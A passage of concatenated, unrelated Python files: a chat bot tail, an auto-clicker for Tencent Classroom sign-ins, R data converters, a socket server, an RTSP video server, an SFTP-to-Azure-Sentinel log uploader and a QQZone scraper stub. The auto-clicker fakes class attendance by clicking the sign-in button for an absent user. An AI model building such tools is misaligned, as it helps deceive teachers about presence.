save()
del model
common.console_print("DerpyMarkov is shutting down now.", console_prefix)
return True
def timed_loop():
while not shutting_down:
if config.save_interval - (time.time() % config.save_interval) < 1:
save()
time.sleep(1.0)
timed_loop_thread = threading.Thread(target = timed_loop, args = [])
timed_loop_thread.start()
|
main.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# --------------------------------------------------------
# 疼讯课堂小助手 (TXClass Helper) Ver 0.6
# Copyright (c) 2022 MoeTwo Studio
# Licensed under The MIT License
# Written by Coolsong
# 提示:在运行本程序前请先阅读自述文件。
# Tip: Please read the readme file before running this.
# --------------------------------------------------------
import base64  # encoding library (decodes the embedded window icon)
import threading  # for spawning threads
from time import sleep
import os
import cv2
import pyautogui
import pyscreeze
import datetime
from tkinter import *
from tkinter.font import Font
from tkinter.ttk import *
import tkinter.messagebox
import winsound
class Application_ui(Frame):
    # This class only builds the UI; the actual event-handling code lives in the Application subclass.
def __init__(self, master=None):
Frame.__init__(self, master)
self.master.title('疼讯课堂小助手 v0.6')
self.master.geometry('350x400')
        self.master.resizable(0, 0)  # disable window resizing
self.createWidgets()
def createWidgets(self):
self.top = self.winfo_toplevel()
self.style = Style()
self.style.configure('TCommand.TButton', font=('微软雅黑', 9))
self.TextFont = Font(font=('微软雅黑', 9))
self.Command1 = Button(self.top, text='开始运行', command=self.Command1_Cmd, style='TCommand.TButton')
self.Command1.place(x=10, y=10, width=70, height=30)
self.Command2 = Button(self.top, text='清空日志', command=self.Command2_Cmd, style='TCommand.TButton')
self.Command2.place(x=100, y=10, width=70, height=30)
self.Label = Label(self.top, text="使用场景", font=self.TextFont)
self.Label.place(x=190, y=15)
v = IntVar()
v.set(0)
self.Command3 = Radiobutton(self.top, text='客户端', variable=v, value=0, command=self.Command3_Cmd)
self.Command3.place(x=190, y=45)
self.Command4 = Radiobutton(self.top, text='网页版', variable=v, value=1, command=self.Command4_Cmd)
self.Command4.place(x=260, y=45)
self.Command5 = Button(self.top, text='查看截图', command=self.Command5_Cmd, style='TCommand.TButton')
self.Command5.place(x=10, y=50, width=160, height=30)
self.sep1 = Separator(self.top, orient=HORIZONTAL)
self.sep1.pack(padx=10, pady=95, fill='x')
self.Label = Label(self.top, text="运行日志", font=self.TextFont)
self.Label.place(x=10, y=115)
self.Text = Text(self.top, fg='#bbbbbb', bg='#3c3f41', font=self.TextFont)
self.Text.place(x=10, y=140, width=330, height=250)
class Application(Application_ui):
    # This class implements the event-handling callbacks; the UI construction code is in Application_ui.
def __init__(self, master=None):
Application_ui.__init__(self, master)
def clickCheck(self):
time = datetime.datetime.now().strftime('%H时%M分%S秒')
try:
self.Text.insert('1.0', f"{time}-监测进程已启动\n")
winsound.Beep(600, 500)
while 1:
                # Take a screenshot first
                screenshot = pyscreeze.screenshot('temp_screenshot.png')
                # Read the image in grayscale (faster to match)
                temp = cv2.imread(r'temp_screenshot.png', cv2.IMREAD_GRAYSCALE)
                theight, twidth = target.shape[:2]
                tempheight, tempwidth = temp.shape[:2]
                # print("Target image width/height: " + str(twidth) + "-" + str(theight))
                # print("Template image width/height: " + str(tempwidth) + "-" + str(tempheight))
                # Scale the screenshot first (INTER_LINEAR / INTER_AREA)
                scaleTemp = cv2.resize(temp, (int(tempwidth / screenScale), int(tempheight / screenScale)))
                stempheight, stempwidth = scaleTemp.shape[:2]
                # print("Scaled template image width/height: " + str(stempwidth) + "-" + str(stempheight))
                # Match the template against the scaled screenshot
res = cv2.matchTemplate(scaleTemp, target, cv2.TM_CCOEFF_NORMED)
mn_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
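                # Added note: TM_CCOEFF_NORMED returns a normalized correlation score, so
                # max_val near 1.0 means a confident match; the 0.9 below is the detection threshold.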
if max_val >= 0.9:
time = datetime.datetime.now().strftime('%H时%M分%S秒')
                    # Compute the center point of the matched region
top_left = max_loc
bottom_right = (top_left[0] + twidth, top_left[1] + theight)
tagHalfW = int(twidth / 2)
tagHalfH = int(theight / 2)
tagCenterX = top_left[0] + tagHalfW
tagCenterY = top_left[1] + tagHalfH
                    # Left-click that position on the screen
pyautogui.click(tagCenterX, tagCenterY, button='left')
self.Text.insert('1.0', f"{time}-发现签到,已尝试点击并于1秒后对结果进行截图\n")
winsound.Beep(1000, 1000)
sleep(1)
screenshot = pyscreeze.screenshot(f'result/{time}.png')
sleep(5)
except Exception as err:
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-ERROR!错误信息:\n{err}\n")
self.Command1['text'] = '发生错误'
winsound.Beep(600, 1000)
tkinter.messagebox.showerror('错误', f'监测进程发生错误,请尝试重新运行程序!\n时间:{time}')
def command1(self):
global screenScale, target
        # Display scaling factor: 2 on macOS (Retina), usually 1 on Windows
screenScale = 1
        # Load the button screenshot ahead of time
if button_img == '':
tkinter.messagebox.showinfo('提示', '请先选择使用场景')
else:
target = cv2.imread(rf"{button_img}", cv2.IMREAD_GRAYSCALE)
if not os.path.exists("result/"): # 新建文件夹
os.mkdir("result/")
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Command1.configure(state=DISABLED)
self.Command3.configure(state=DISABLED)
self.Command4.configure(state=DISABLED)
self.Command1['text'] = '正在运行'
self.Text.insert('1.0', f"{time}-开始运行\n=====\n提示:请以管理员身份运行本程序\n否则有可能无法执行点击操作\n操作方法:右键点击本程序选择'以管理员身份运行'\n"
f"=====\n")
self.clickCheck()
pass
def command2(self):
self.Text.delete("1.0", END)
def Command1_Cmd(self, event=None):
self.thread_it(self.command1)
def Command2_Cmd(self, event=None):
self.thread_it(self.command2)
def Command3_Cmd(self, event=None):
global button_img
button_img = 'pc.png'
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-使用场景已设置为:客户端\n")
def Command4_Cmd(self, event=None):
global button_img
button_img = 'web.png'
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-使用场景已设置为:网页端\n")
def Command5_Cmd(self, event=None):
if not os.path.exists("result/"):
time = datetime.datetime.now().strftime('%H时%M分%S秒')
self.Text.insert('1.0', f"{time}-提示:你还没有运行截图,请先运行再试!\n")
else:
os.startfile("result")
@staticmethod
def thread_it(func, *args):
        t = threading.Thread(target=func, args=args)
        t.daemon = True  # daemon -- even if the main window closes, the thread keeps running in the background (not true!)
        t.start()  # start the thread
        # t.join()  # blocking -- would freeze the UI!
if __name__ == "__main__":
button_img = ''
img = '''AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/31nLv99Zy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/gIAC/4JmZP+BZ+X/gWfl/4JmZP+AgAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/gGgc/oBml/+Faev/gWj9/4Fn/f+Fauv+gGaX/4BmGgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP+AAAL/hGMY/35osf+Kbe//fmrn/4lgkf+JYJH/fmrn/4hs7/+AZrv/gGU+AAAAAAAAAAAAAAAAAAAAAAAAAAD/uToG/8Q0dv+QWpX/gm61/plUkf/FOLn/xDe5/5pTjf6Ba8X/hmz3/oBlsf+qqgIAAAAAAAAAAAAAAAAAAAAA/79ABv/JMsH/wzfF/7RDn//FNcv/zjPx/80y8f/JNcn/rUiZ/4Zpsf99Z8f+hoYEAAAAAAAAAAAAAAAAAAAAAP+/QAL/yTPR/88z9//PM9v/yjP7/8o0///JL///yzP7/88z0f+4Qav/jluD/4CAAgAAAAAAAAAAAAAAAP+qVQL/yTM8/8oz4//MM///zDP//8kz///cfP//0E7//8ct///MMv//zzPj/8Q3qf/LNDz/qlUCAAAAAP/LNBr+yDNU/8w0tf/LM/n/yTP//8kz///IMv//8cv//+qw///UYP//yTX//8sz///MMvf+zjSz/8gzVv/HMxr/yDJU/8kzz//PNf//yjP//8kz///JM///yDH///Xc/////v//7b3//81E///IL///yjP//881///JM9H/yDJU/8cyVv/KM7n/zTTt/8sz///JM///yTP//8gx///12///+Of//+qw///NRv//yDD//8sz///NNO3/yjO5/8kyVgAAAAD/yzMo/8o0mf/PNOH/yjP//8oz///IMv//7b3//+KT///KOv//yC7//8o0///PNOH/yjSZ/8YyKAAAAAAAAAAAAAAAAP/INwz/yzNw/8sz2f/NNPn/yjT//9JW///IL///yTD//800+f/LM9v/yzNw/8g3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP/KMkL/yzPD/9A08//ILf//yTP//9A08//LM8P/xzFEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/78uGv7JNJ3/zDT3/8w09/7LNJ3/yC4aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/8k0if/LNIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAP5/AAD4HwAA8A8AAPAHAADgBwAA4AcAAOAHAADAAwAAgAEAAIABAADAAwAA8A8AAPgfAAD8PwAA/n8AAA== '''
tmp = open("tmp.ico", "wb+")
tmp.write(base64.b64decode(img))
tmp.close()
top = Tk()
top.iconbitmap('tmp.ico')
os.remove("tmp.ico") # 删掉临时文件
Application(top).mainloop()
|
dsc_io.py
|
#!/usr/bin/env python
__author__ = "Gao Wang"
__copyright__ = "Copyright 2016, Stephens lab"
__email__ = "gaow@uchicago.edu"
__license__ = "MIT"
'''
Test rpy2 installation:
python -m 'rpy2.tests'
'''
from dsc.utils import flatten_list
def load_mpk(mpk_files, jobs=2):
import msgpack, collections
from multiprocessing import Process, Manager
from .utils import chunks
if isinstance(mpk_files, str):
return msgpack.unpackb(open(mpk_files, "rb").read(),
encoding='utf-8',
object_pairs_hook=collections.OrderedDict)
d = Manager().dict()
def f(d, x):
for xx in x:
d.update(
msgpack.unpackb(open(xx, "rb").read(),
encoding='utf-8',
object_pairs_hook=collections.OrderedDict))
#
mpk_files = [x for x in chunks(mpk_files, int(len(mpk_files) / jobs) + 1)]
job_pool = [Process(target=f, args=(d, x)) for x in mpk_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return collections.OrderedDict([
(x, d[x]) for x in sorted(d.keys(), key=lambda x: int(x.split(':')[0]))
])
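# Added note: the merged results above are re-ordered by the integer prefix of each
# key (keys are assumed to look like "<index>:<name>"), so the parallel workers can
# finish in any order without affecting the final ordering.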
def load_rds(filename, types=None):
import os
import pandas as pd, numpy as np
import rpy2.robjects as RO
import rpy2.robjects.vectors as RV
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
def load(data, types, rpy2_version=3):
if types is not None and not isinstance(data, types):
return np.array([])
# FIXME: I'm not sure if I should keep two versions here
# rpy2_version 2.9.X is more tedious but it handles BoolVector better
# rpy2 version 3.0.1 converts bool to integer directly without dealing with
# NA properly. It gives something like (0,1,-234235).
# Possibly the best thing to do is to open an issue for it to the developers.
if rpy2_version == 2:
# below works for rpy2 version 2.9.X
if isinstance(data, RI.RNULLType):
res = None
elif isinstance(data, RV.BoolVector):
data = RO.r['as.integer'](data)
res = np.array(data, dtype=int)
# Handle c(NA, NA) situation
if np.sum(np.logical_and(res != 0, res != 1)):
res = res.astype(float)
res[res < 0] = np.nan
res[res > 1] = np.nan
elif isinstance(data, RV.FactorVector):
data = RO.r['as.character'](data)
res = np.array(data, dtype=str)
elif isinstance(data, RV.IntVector):
res = np.array(data, dtype=int)
elif isinstance(data, RV.FloatVector):
res = np.array(data, dtype=float)
elif isinstance(data, RV.StrVector):
res = np.array(data, dtype=str)
elif isinstance(data, RV.DataFrame):
res = pd.DataFrame(data)
elif isinstance(data, RV.Matrix):
res = np.matrix(data)
elif isinstance(data, RV.Array):
res = np.array(data)
else:
# I do not know what to do for this
# But I do not want to throw an error either
res = str(data)
else:
if isinstance(data, RI.NULLType):
res = None
else:
res = data
if isinstance(res, np.ndarray) and res.shape == (1, ):
res = res[0]
return res
def load_dict(res, data, types):
'''load data to res'''
names = data.names if not isinstance(data.names, RI.NULLType) else [
i + 1 for i in range(len(data))
]
for name, value in zip(names, list(data)):
if isinstance(value, RV.ListVector):
res[name] = {}
res[name] = load_dict(res[name], value, types)
else:
res[name] = load(value, types)
return res
#
if not os.path.isfile(filename):
raise IOError('Cannot find file ``{}``!'.format(filename))
rds = RO.r['readRDS'](filename)
if isinstance(rds, RV.ListVector):
res = load_dict({}, rds, types)
else:
res = load(rds, types)
return res
def save_rds(data, filename):
    import collections.abc, re
import pandas as pd
import numpy as np
import rpy2.robjects as RO
import rpy2.rinterface as RI
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects import pandas2ri
pandas2ri.activate()
# Supported data types:
# int, float, str, tuple, list, numpy array
# numpy matrix and pandas dataframe
int_type = (int, np.int8, np.int16, np.int32, np.int64)
    float_type = (float, np.floating)
def assign(name, value):
name = re.sub(r'[^\w' + '_.' + ']', '_', name)
if isinstance(value, (tuple, list)):
if all(isinstance(item, int_type) for item in value):
value = np.asarray(value, dtype=int)
elif all(isinstance(item, float_type) for item in value):
value = np.asarray(value, dtype=float)
else:
value = np.asarray(value)
if isinstance(value, np.matrix):
value = np.asarray(value)
if isinstance(
value,
tuple(flatten_list((str, float_type, int_type, np.ndarray)))):
if isinstance(value, np.ndarray) and value.dtype.kind == "u":
value = value.astype(int)
RO.r.assign(name, value)
elif isinstance(value, pd.DataFrame):
# FIXME: does not always work well for pd.DataFrame
RO.r.assign(name, value)
elif value is None:
RO.r.assign(name, RI.NULL)
else:
raise ValueError(
"Saving ``{}`` to RDS file is not supported!".format(
str(type(value))))
#
def assign_dict(name, value):
RO.r('%s <- list()' % name)
for k, v in value.items():
k = re.sub(r'[^\w' + '_.' + ']', '_', str(k))
if k.isdigit():
k = str(k)
            if isinstance(v, collections.abc.Mapping):
assign_dict('%s$%s' % (name, k), v)
else:
assign('item', v)
RO.r('%s$%s <- item' % (name, k))
#
    if isinstance(data, collections.abc.Mapping):
assign_dict('res', data)
else:
assign('res', data)
RO.r("saveRDS(res, '%s')" % filename)
def load_dsc(infiles):
import pickle, yaml
if isinstance(infiles, str):
infiles = [infiles]
res = dict()
for infile in infiles:
if infile.endswith('.pkl'):
data = pickle.load(open(infile, 'rb'))
elif infile.endswith('.rds'):
data = load_rds(infile)
elif infile.endswith('.yml'):
data = yaml.safe_load(open(infile).read())
else:
raise ValueError(f'``{infile}`` is not supported DSC data format')
try:
res.update(data)
except Exception:
# loaded a non-recursive object
return data
return res
def convert_dsc(pkl_files, jobs=2):
import pickle
from multiprocessing import Process
from .utils import chunks
def convert(d):
for ff in d:
if not ff.endswith('pkl'):
raise ValueError(f'``{ff}`` is not supported DSC data format')
save_rds(pickle.load(open(ff, 'rb')), ff[:-4] + '.rds')
#
if isinstance(pkl_files, str):
convert([pkl_files])
return 0
#
pkl_files = [x for x in chunks(pkl_files, int(len(pkl_files) / jobs) + 1)]
job_pool = [Process(target=convert, args=(x, )) for x in pkl_files]
for job in job_pool:
job.start()
for job in job_pool:
job.join()
return 0
def symlink_force(target, link_name):
import os, errno
try:
os.symlink(target, link_name)
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(link_name)
os.symlink(target, link_name)
else:
raise e
def csv_to_html(infile, outfile):
import os
import pandas as pd
    pd.set_option('display.max_colwidth', None)
from dsc.constant import TABLE_HEADER
def pop_html_img(x):
if not isinstance(x, str):
return x
if not (x.endswith('.png') or x.endswith('.jpg')):
return x
base, name = os.path.split(x)
if os.path.isfile(name):
full_path = False
elif os.path.isfile(x):
full_path = True
else:
return x
content = f'''<a href="{x if full_path else name}" onmouseover="showPopup(this, '{x if full_path else name}')" onmouseout="hidePopup()">{name if len(name) < 15 else "Image"}</a> <div id="popup"> </div></td>'''
return content
data = pd.read_csv(infile).applymap(pop_html_img)
with open(outfile, 'w') as f:
f.write(TABLE_HEADER + data.to_html(justify='center', escape=False))
def main():
import os, sys, pickle
if len(sys.argv) < 3:
sys.exit(0)
# Input is pkl, output is rds
infile = sys.argv[1]
outfile = sys.argv[2]
if '-f' in sys.argv:
try:
os.remove(outfile)
except Exception:
pass
if not os.path.isfile(outfile):
if infile.endswith('.pkl') and outfile.endswith('.rds'):
save_rds(pickle.load(open(infile, 'rb')), outfile)
elif infile.endswith('.rds') and outfile.endswith('.pkl'):
pickle.dump(load_rds(infile), open(outfile, 'wb'))
elif infile.endswith('.csv') and outfile.endswith('.html'):
csv_to_html(infile, outfile)
else:
sys.exit(1)
return 0
if __name__ == '__main__':
import warnings
from rpy2.rinterface import RRuntimeWarning
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=RRuntimeWarning)
main()
|
untitled1.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 22 16:57:44 2019
@author: cliffk
"""
from distributed import Scheduler
from tornado.ioloop import IOLoop
from threading import Thread
loop = IOLoop.current()
t = Thread(target=loop.start, daemon=True)
t.start()
s = Scheduler(loop=loop)
s.start('tcp://:8786') # Listen on TCP port 8786
|
myServer.py
|
import threading
import socket
import sys
#Host and port declaration (uses localhost)
host = '127.0.0.1'
port = 8080
#Creates socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Server binding
server.bind((host, port))
server.listen()
#Handles the client messages
def clientHandler(client, address):
    #Constantly checks for incoming messages
while True:
        #Receives the next message from the client
try:
message = client.recv(1024).decode('ascii')
            #Checks for a client request to disconnect
            if message == '#exit':
                #Sends a disconnect confirmation to the client
                client.send("You have been disconnected".encode('ascii'))
                client.close()
                #Prints a disconnected message on the server
                print(f"Client({address}) has chosen to disconnect")
break
            #Runs the normal message receiver
            else:
                #Prints the client message confirmation on the server
                print(f"received '{message}' from Client({address})")
                #Sends a message confirmation to the client
                client.send(f"SERVER : '{message}' received by server".encode('ascii'))
        #Closes the connection on error
        except Exception:
            client.close()
            print(f"Client({address}) has disconnected // an ERROR occurred!")
            break
    #The handler returns here, which ends the client thread
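#A minimal matching client sketch (added illustration; never called by the server).
#It assumes the same host/port constants above and the '#exit' convention handled
#in clientHandler.
def exampleClient():
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    print(client.recv(1024).decode('ascii'))  # connection confirmation from the server
    client.send('hello server'.encode('ascii'))
    print(client.recv(1024).decode('ascii'))  # echo confirmation
    client.send('#exit'.encode('ascii'))      # ask the server to disconnect us
    print(client.recv(1024).decode('ascii'))  # "You have been disconnected"
    client.close()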
#Runs the server (accepts new connections and creates a thread for client handler function)
def runServer():
#Prints confirmation message
print("The server is running")
#port = input("Give port : ")
while True:
        #Acknowledges and accepts a client connection
        client, address = server.accept()
        print(f"Connection established with Client({str(address)})")
#Gives client the connection confirmation
client.send('You have been connected to the server'.encode('ascii'))
#Creates a thread to handle the connected client
thread = threading.Thread(target = clientHandler, args = (client, address))
thread.start()
#Call to the runServer main method
runServer()
|
server.py
|
import socket
from time import sleep
from threading import Thread
from typing import Union
from utils.video_stream import VideoStream
from utils.rtsp_packet import RTSPPacket
from utils.rtp_packet import RTPPacket
class Server:
FRAME_PERIOD = 1000//VideoStream.DEFAULT_FPS # in milliseconds
SESSION_ID = '123456'
DEFAULT_HOST = '127.0.0.1'
DEFAULT_CHUNK_SIZE = 4096
# for allowing simulated non-blocking operations
# (useful for keyboard break)
RTSP_SOFT_TIMEOUT = 100 # in milliseconds
class STATE:
INIT = 0
PAUSED = 1
PLAYING = 2
FINISHED = 3
TEARDOWN = 4
def __init__(self, rtsp_port: int):
self._video_stream: Union[None, VideoStream] = None
self._rtp_send_thread: Union[None, Thread] = None
self._rtsp_connection: Union[None, socket.socket] = None
self._rtp_socket: Union[None, socket.socket] = None
        self._client_address: Optional[Tuple[str, int]] = None
self.server_state: int = self.STATE.INIT
self.rtsp_port = rtsp_port
def _rtsp_recv(self, size=DEFAULT_CHUNK_SIZE) -> bytes:
recv = None
while True:
try:
recv = self._rtsp_connection.recv(size)
break
except socket.timeout:
continue
print(f"Received from client: {repr(recv)}")
return recv
def _rtsp_send(self, data: bytes) -> int:
print(f"Sending to client: {repr(data)}")
return self._rtsp_connection.send(data)
def _get_rtsp_packet(self) -> RTSPPacket:
return RTSPPacket.from_request(self._rtsp_recv())
def _wait_connection(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = self.DEFAULT_HOST, self.rtsp_port
s.bind(address)
print(f"Listening on {address[0]}:{address[1]}...")
s.listen(1)
print("Waiting for connection...")
self._rtsp_connection, self._client_address = s.accept()
self._rtsp_connection.settimeout(self.RTSP_SOFT_TIMEOUT/1000.)
print(f"Accepted connection from {self._client_address[0]}:{self._client_address[1]}")
def _wait_setup(self):
if self.server_state != self.STATE.INIT:
raise Exception('server is already setup')
while True:
packet = self._get_rtsp_packet()
if packet.request_type == RTSPPacket.SETUP:
self.server_state = self.STATE.PAUSED
print('State set to PAUSED')
self._client_address = self._client_address[0], packet.rtp_dst_port
self._setup_rtp(packet.video_file_path)
self._send_rtsp_response(packet.sequence_number)
break
def setup(self):
self._wait_connection()
self._wait_setup()
def _start_rtp_send_thread(self):
self._rtp_send_thread = Thread(target=self._handle_video_send)
        self._rtp_send_thread.daemon = True
self._rtp_send_thread.start()
def _setup_rtp(self, video_file_path: str):
print(f"Opening up video stream for file {video_file_path}")
self._video_stream = VideoStream(video_file_path)
print('Setting up RTP socket...')
self._rtp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._start_rtp_send_thread()
def handle_rtsp_requests(self):
print("Waiting for RTSP requests...")
# main thread will be running here most of the time
while True:
packet = self._get_rtsp_packet()
# assuming state will only ever be PAUSED or PLAYING at this point
if packet.request_type == RTSPPacket.PLAY:
if self.server_state == self.STATE.PLAYING:
print('Current state is already PLAYING.')
continue
self.server_state = self.STATE.PLAYING
print('State set to PLAYING.')
elif packet.request_type == RTSPPacket.PAUSE:
if self.server_state == self.STATE.PAUSED:
print('Current state is already PAUSED.')
continue
self.server_state = self.STATE.PAUSED
print('State set to PAUSED.')
elif packet.request_type == RTSPPacket.TEARDOWN:
print('Received TEARDOWN request, shutting down...')
self._send_rtsp_response(packet.sequence_number)
self._rtsp_connection.close()
self._video_stream.close()
self._rtp_socket.close()
self.server_state = self.STATE.TEARDOWN
# for simplicity's sake, caught on main_server
raise ConnectionError('teardown requested')
else:
# will never happen, since exception is raised inside `parse_rtsp_request()`
# raise InvalidRTSPRequest()
pass
self._send_rtsp_response(packet.sequence_number)
def _send_rtp_packet(self, packet: bytes):
to_send = packet[:]
while to_send:
try:
self._rtp_socket.sendto(to_send[:self.DEFAULT_CHUNK_SIZE], self._client_address)
except socket.error as e:
print(f"failed to send rtp packet: {e}")
return
# trim bytes sent
to_send = to_send[self.DEFAULT_CHUNK_SIZE:]
def _handle_video_send(self):
print(f"Sending video to {self._client_address[0]}:{self._client_address[1]}")
while True:
if self.server_state == self.STATE.TEARDOWN:
return
if self.server_state != self.STATE.PLAYING:
sleep(0.5) # diminish cpu hogging
continue
if self._video_stream.current_frame_number >= VideoStream.VIDEO_LENGTH-1: # frames are 0-indexed
print('Reached end of file.')
self.server_state = self.STATE.FINISHED
return
frame = self._video_stream.get_next_frame()
frame_number = self._video_stream.current_frame_number
rtp_packet = RTPPacket(
payload_type=RTPPacket.TYPE.MJPEG,
sequence_number=frame_number,
timestamp=frame_number*self.FRAME_PERIOD,
payload=frame
)
print(f"Sending packet #{frame_number}")
print('Packet header:')
rtp_packet.print_header()
packet = rtp_packet.get_packet()
self._send_rtp_packet(packet)
sleep(self.FRAME_PERIOD/1000.)
def _send_rtsp_response(self, sequence_number: int):
response = RTSPPacket.build_response(sequence_number, self.SESSION_ID)
self._rtsp_send(response.encode())
print('Sent response to client.')
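# --- Hedged example (added): a minimal sketch of how this Server class appears intended to be
# --- driven; the actual entry point (referred to above as main_server) is not part of this file,
# --- and the RTSP port 8554 below is only an illustrative assumption.
def example_main(rtsp_port: int = 8554):
    server = Server(rtsp_port)
    server.setup()
    try:
        server.handle_rtsp_requests()
    except ConnectionError:
        # handle_rtsp_requests() raises ConnectionError after a TEARDOWN request
        print('Session torn down, exiting.')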
|
__init__.py
|
import requests
import datetime
import dateutil
import logging
import gzip
import io
import csv
import time
import os
import sys
import json
import hashlib
import hmac
import base64
import pysftp
from threading import Thread
from io import StringIO
import azure.functions as func
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
sentinel_log_type = os.environ.get('LogAnalyticsCustomLogName')
sfcc_sftp_username = os.environ.get('SfccSftpUsername')
sfcc_sftp_password = os.environ.get('SfccSftpPassword')
sfcc_sftp_filename = os.environ.get('SfccSftpFilename')
sfcc_sftp_filepath = os.environ.get('SfccSftpFilepath')
sfcc_sftp_host = os.environ.get('SfccSftpHost')
sfcc_sftp_cnopts = os.environ.get('SfccSftpCnopts')
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
#get files via SFTP
with pysftp.Connection(sfcc_sftp_host, username=sfcc_sftp_username, password=sfcc_sftp_password, private_key=".ppk", cnopts=sfcc_sftp_cnopts) as sftp:
sftp.cwd(sfcc_sftp_filepath)
        # pysftp's get() copies the remote file into the local working directory and returns
        # None, so the downloaded copy is reopened by its filename below
        sftp.get(sfcc_sftp_filename)
    sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
    with open(sfcc_sftp_filename, "r") as read_file:
        data = json.load(read_file)
        # keep the connector open for the whole loop so events are batched and flushed once at the end
        with sentinel:
            for entry in data:
                sentinel.send(entry)
class AzureSentinelConnector:
def __init__(self, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
self.failedToSend = False
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
def __enter__(self):
        return self
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body, sort_keys=True)
print(body)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
uri = 'https://' + customer_id + '.ods.opinsights.azure.com' + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
print(response.status_code)
self.successfull_sent_events_number += events_number
self.failedToSend = False
else:
print(response.status_code)
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
self.failedToSend = True
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
|
main.py
|
import sys
import os
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
sys.path.append(os.path.split(rootPath)[0])
print(sys.path)
from src.analysis.QQZoneAnalysis import QQZoneAnalysis
from src.spider.QQZoneSpider import QQZoneSpider
from src.util.constant import WEB_SPIDER_INFO, CLEAN_DATA_KEY, LOGIN_FAILED, \
USER_MAP_KEY, GET_MOOD_FAILED, MOOD_FINISH_KEY, WAITING_USER_LIST, FINISH_USER_NUM_KEY, USER_LOGIN_STATE
import threading
def capture_main_data():
"""
    Run the spider and capture the data.
:return:
"""
print(sys.path)
sp = QQZoneSpider(use_redis=True, debug=True, download_small_image=False, download_big_image=False)
sp.login_with_qr_code()
sp.get_main_page_info()
sp.get_mood_list()
sp.user_info.save_user(sp.username)
def capture_main_data_and_analysis():
"""
    Run the spider and then analyse the captured data.
:return:
"""
qa = QQZoneAnalysis(use_redis=False, debug=True, stop_time='2011-11-11', mood_num=20, analysis_friend=False)
qa.login_with_qr_code()
qa.get_main_page_info()
qa.get_mood_list()
if qa.analysis_friend:
qa.thread_num = 20
